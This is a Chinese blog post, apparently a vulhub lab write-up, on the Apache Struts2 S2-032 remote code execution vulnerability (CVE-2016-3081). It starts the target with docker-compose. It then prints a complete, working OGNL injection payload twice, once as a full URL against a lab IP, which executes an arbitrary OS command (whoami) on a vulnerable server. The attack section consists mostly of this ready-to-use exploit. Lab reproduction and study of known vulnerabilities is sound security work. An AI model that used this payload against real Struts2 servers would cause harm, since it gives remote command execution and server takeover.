【vulhub】Structs2 S2-032 远程代码执行漏洞(CVE-2016-3081)

最新推荐文章于 2024-05-13 09:53:23 发布
最新推荐文章于 2024-05-13 09:53:23 发布
阅读量953 收藏 1
点赞数 1
分类专栏: structs2 文章标签: struts 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42884199/article/details/121778633
版权

前言

4月15号安恒安全研究院在Struts 2上发现了一个严重的远程代码执行漏洞(CVE-2016-3081)(http://seclab.dbappsecurity.com.cn/?p=924),也即Struts 2的s2-032漏洞,4月26日,互联网上披露了Apache Struts 2 S2-032远程代码执行漏洞的利用代码,经测试,远程攻击者利用漏洞可在开启动态方法调用功能的Apache Struts 2服务器上执行任意代码,取得网站服务器控制权。

影响版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3)

一、启动靶机

docker-compose build

docker-compose up -d

二、漏洞利用

method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=whoami

直接把上述的payload拼接url后,可执行whoami命令
URL:

http://192.168.150.146:8080/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=whoami

在这里插入图片描述

参考:

https://zhuanlan.51cto.com/art/201604/510405.htm

Crazy_Yu8
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
structs2最新远程执行漏洞S2-057、反序列化漏洞等修复方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修复方案
墨者学院Apache Struts2远程代码执行漏洞(S2-032)
全村的希望
10-13 371
墨者学院Apache Struts2远程代码执行漏洞(S2-032)
墨者Apache Struts2远程代码执行漏洞(S2-032)复现题解
zr1213159840的博客
01-15 2676
通过以下链接,能查到s2-032的漏洞信息,我们按照这个指导进行。 https://github.com/vulhub/vulhub/blob/master/struts2/s2-032/README.zh-cn.md 首先对访问的页面进行抓包,然后填入以下poc index.action?method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@g
vulhub靶机struts2环境下的s2-032(CVE-2016-3081)(远程命令执行漏洞
最新发布
m0_73248913的博客
05-13 266
当用户提交表单数据并验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。Struts 2.3.19至2.3.20.2、2.3.21至2.3.24.1和2.3.25至2.3.28。如果返回的页面出现异常,则可以认定为目标是基于 Struts2 构建的。2、 页面上输出了与业务有关错误消息,或者 1111 被回显到了页面上。1、 页面直接出现 404 或者 500 等错误。3、 页面的内容结构发生了明显的改变。4、 页面发生了重定向。
Struts2 S2-032漏洞复现
ZJT6666666的博客
01-04 496
Struts2 S2-032漏洞复现
墨者学院 Apache Struts2远程代码执行漏洞(S2-032)
人若无名,便可专心练剑
10-12 179
打开 web 页面:利用Struts2工具进行远程命令执行
S2-032远程执行代码漏洞CVE-2016-3081)
m0_65150886的博客
01-09 454
国内安全企业安恒信息的安全研究员Nike.zheng在Struts 2上发现存在高危安全漏洞CVE-2016-3081,S02-32),黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有struts版本。借此漏洞,攻击者可以继承Web服务程序的权限去执行系统命令(任意代码)或读写文件;Apache Struts 2是世界上最流行的Java Web服务器框架之一。1.访问http://ip:port,出现如下页面,开始实验。
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
攻击者可以通过提交恶意的、可反序列化的对象,触发远程代码执行(RCE)。 接下来是s2-016漏洞CVE-2016-1000031),这是2016年发现的一个高危漏洞,也与OGNL有关。此漏洞在于Struts2的...
S2-016/017漏洞工具 struts漏洞
02-26
本工具可以详细测试S2-016/017漏洞的资源,有助于您更深层的了解struts!
E046-服务漏洞利用及加固-利用structs2实现远程命令执行.pdf
12-02
本文将深入探讨一个安全漏洞的利用与加固,特别是如何利用Structs2框架中的漏洞实现远程命令执行。该课程以E046为主题,涵盖了网络安全领域的一个重要问题,即服务漏洞的利用和防御策略。我们将首先了解实验环境,...
Struts2-Scan:Struts2全漏洞扫描利用工具
05-04
Struts2-ScanStruts2漏洞利用扫描工具,基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具,目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019...
S2-032 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-16 1137
什么是STRUTS 2漏洞? Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基于Java EEWeb应用的MVC设计模式的应用框架,Struts 2是Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 Struts2框架广泛应用于政府、公安、交通、金融行业和运...
vulfocus-struts2 命令执行CVE-2016-3081)
Fanny0602的博客
06-16 1902
vulfocus靶场:struts2 命令执行CVE-2016-3081)。
Struts2 S2 – 032远程代码执行漏洞分析报告
热门推荐
煜铭2011
04-30 1万+
Struts2 S2 – 032远程代码执行漏洞分析报告 一、漏洞基本信息 CVE编号:CVE-2016-3081 漏洞名称:Struts2 S2 – 032远程代码执行 漏洞发布日期:2016.4.15 受影响的软件及系统:Struts2版本:Struts2 2.0.0 -2.3.28( 2.2.3(2.3.20.2和2.3.42.2不受影响) 漏洞概述:Apache Struts 2...
vulfocus靶场struts2 命令执行 CVE-2016-3081
没有故事
04-23 445
后面接payload。Struts 2服务器上执行任意代码,取得网站服务器控制权。payload: 红色部分为可替换的执行命令。远程攻击者利用漏洞可。
Apache Struts 远程代码执行漏洞(CVE-2016-3081)
Darklord.W
10-20 1810
漏洞简介 漏洞描述 Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions. 影响范围 Apach...
CVE-2016-3081
龙卷风摧毁停车场
02-27 451
Struts是Apache基金会的一个开源项目,Struts通过采用Java Servlet/JSP技术,实现了基于Java EE Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品。目前,Struts框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用,是应用最广泛的Web应用框架之一。Apache Struts 2中存在安全漏洞
struts2 s2-032漏洞分析
weixin_34277853的博客
03-04 506
0x01Brief Description 最近面试几家公司,很多都问到了s2漏洞的原理,之前调试分析过java反序列化的漏洞,觉得s2漏洞应该不会太难,今天就分析了一下,然后发现其实漏洞的原理不难,但是搭建j2ee调试的环境花了将近半天的时间QAQ. Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基...
Spring-Hibernate-Struts2 整合实战指南
"本资源是一份详尽的教程,涵盖了Spring、Hibernate以及Struts2三大框架的基础知识和整合应用。通过这份文档,学习者可以深入理解这三个流行框架的核心概念和实践技巧。" 在Java开发领域,Spring、Hibernate和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值